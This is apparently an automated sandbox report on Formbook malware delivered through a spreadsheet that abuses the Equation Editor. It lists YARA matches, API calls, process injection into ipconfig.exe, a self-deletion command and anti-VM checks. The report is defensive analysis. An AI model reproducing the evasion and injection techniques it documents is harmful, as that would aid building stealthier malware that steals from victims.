      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs, Long String: Length: 38272
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.cs, Long String: Length: 38272
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs, Long String: Length: 38272
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exeCode function: String function: 00A7E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00A7DF5C appears 107 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AEF970 appears 81 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AC373B appears 238 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AC3F92 appears 108 times
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004181C0 NtCreateFile,8_2_004181C0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00418270 NtReadFile,8_2_00418270
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004182F0 NtClose,8_2_004182F0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004183A0 NtAllocateVirtualMemory,8_2_004183A0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041839A NtAllocateVirtualMemory,8_2_0041839A
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A700C4 NtCreateFile,LdrInitializeThunk,8_2_00A700C4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70078 NtResumeThread,LdrInitializeThunk,8_2_00A70078
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,8_2_00A70048
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A707AC NtCreateMutant,LdrInitializeThunk,8_2_00A707AC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F9F0 NtClose,LdrInitializeThunk,8_2_00A6F9F0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F900 NtReadFile,LdrInitializeThunk,8_2_00A6F900
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_00A6FAE8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_00A6FAD0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_00A6FBB8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_00A6FB68
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,8_2_00A6FC90
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_00A6FC60
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,8_2_00A6FD8C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_00A6FDC0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,8_2_00A6FEA0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_00A6FED0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,8_2_00A6FFB4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A710D0 NtOpenProcessToken,8_2_00A710D0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70060 NtQuerySection,8_2_00A70060
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A701D4 NtSetValueKey,8_2_00A701D4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7010C NtOpenDirectoryObject,8_2_00A7010C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71148 NtOpenThread,8_2_00A71148
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F8CC NtWaitForSingleObject,8_2_00A6F8CC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71930 NtSetContextThread,8_2_00A71930
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F938 NtWriteFile,8_2_00A6F938
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAB8 NtQueryValueKey,8_2_00A6FAB8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA20 NtQueryInformationFile,8_2_00A6FA20
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA50 NtEnumerateValueKey,8_2_00A6FA50
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBE8 NtQueryVirtualMemory,8_2_00A6FBE8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB50 NtCreateKey,8_2_00A6FB50
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC30 NtOpenProcess,8_2_00A6FC30
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70C40 NtGetContextThread,8_2_00A70C40
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC48 NtSetInformationFile,8_2_00A6FC48
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71D80 NtSuspendThread,8_2_00A71D80
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD5C NtEnumerateKey,8_2_00A6FD5C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FE24 NtWriteVirtualMemory,8_2_00A6FE24
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFFC NtCreateProcessEx,8_2_00A6FFFC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FF34 NtQueueApcThread,8_2_00A6FF34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F400C4 NtCreateFile,LdrInitializeThunk,11_2_01F400C4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F407AC NtCreateMutant,LdrInitializeThunk,11_2_01F407AC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F9F0 NtClose,LdrInitializeThunk,11_2_01F3F9F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F900 NtReadFile,LdrInitializeThunk,11_2_01F3F900
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_01F3FBB8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01F3FB68
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB50 NtCreateKey,LdrInitializeThunk,11_2_01F3FB50
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_01F3FAE8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01F3FDC0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD8C NtDelayExecution,LdrInitializeThunk,11_2_01F3FD8C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_01F3FC60
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFB4 NtCreateSection,LdrInitializeThunk,11_2_01F3FFB4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_01F3FED0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F401D4 NtSetValueKey,11_2_01F401D4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41148 NtOpenThread,11_2_01F41148
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4010C NtOpenDirectoryObject,11_2_01F4010C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F410D0 NtOpenProcessToken,11_2_01F410D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40078 NtResumeThread,11_2_01F40078
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40060 NtQuerySection,11_2_01F40060
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40048 NtProtectVirtualMemory,11_2_01F40048
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41930 NtSetContextThread,11_2_01F41930
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F938 NtWriteFile,11_2_01F3F938
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F8CC NtWaitForSingleObject,11_2_01F3F8CC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBE8 NtQueryVirtualMemory,11_2_01F3FBE8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAD0 NtAllocateVirtualMemory,11_2_01F3FAD0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAB8 NtQueryValueKey,11_2_01F3FAB8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA50 NtEnumerateValueKey,11_2_01F3FA50
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA20 NtQueryInformationFile,11_2_01F3FA20
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41D80 NtSuspendThread,11_2_01F41D80
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD5C NtEnumerateKey,11_2_01F3FD5C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC90 NtUnmapViewOfSection,11_2_01F3FC90
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40C40 NtGetContextThread,11_2_01F40C40
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC48 NtSetInformationFile,11_2_01F3FC48
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC30 NtOpenProcess,11_2_01F3FC30
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFFC NtCreateProcessEx,11_2_01F3FFFC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FF34 NtQueueApcThread,11_2_01F3FF34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FEA0 NtReadVirtualMemory,11_2_01F3FEA0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FE24 NtWriteVirtualMemory,11_2_01F3FE24
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D81C0 NtCreateFile,11_2_000D81C0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D8270 NtReadFile,11_2_000D8270
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D82F0 NtClose,11_2_000D82F0
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: ORDER CONFIRMATION.xlsxVirustotal: Detection: 32%
      Source: ORDER CONFIRMATION.xlsxReversingLabs: Detection: 29%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF298.tmp
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/19@22/4
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe

      Data Obfuscation:

      .NET source code contains potential unpacker
      Source: vbc[1].exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: vbc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E4D58 push esp; ret 6_2_001E4D59
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E879A push edx; retf 6_2_001E879B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E87CE push ds; retf 6_2_001E87CF
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00415080 push esi; ret 8_2_004150B6
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00416235 push edi; iretd 8_2_00416267
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B3B5 push eax; ret 8_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B46C push eax; ret 8_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B402 push eax; ret 8_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B40B push eax; ret 8_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7DFA1 push ecx; ret 8_2_00A7DFB4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4DFA1 push ecx; ret 11_2_01F4DFB4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D5080 push esi; ret 11_2_000D50B6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D6235 push edi; iretd 11_2_000D6267
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB3B5 push eax; ret 11_2_000DB408
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB40B push eax; ret 11_2_000DB472
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB402 push eax; ret 11_2_000DB408
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB46C push eax; ret 11_2_000DB472
      Source: vbc[1].exe.4.drStatic PE information: 0x82CF36F5 [Mon Jul 18 16:08:21 2039 UTC]
      Source: initial sampleStatic PE information: section name: .text entropy: 7.19334150193

      Persistence and Installation Behavior:

      Uses ipconfig to lookup or modify the Windows network settings
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Yara detected AntiVM3
      Source: Yara matchFile source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2976, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000C85E4 second address: 00000000000C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000C897E second address: 00000000000C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1868Thread sleep time: -180000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1828Thread sleep time: -38487s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1016Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004088B0 rdtsc 8_2_004088B0
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 38487
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
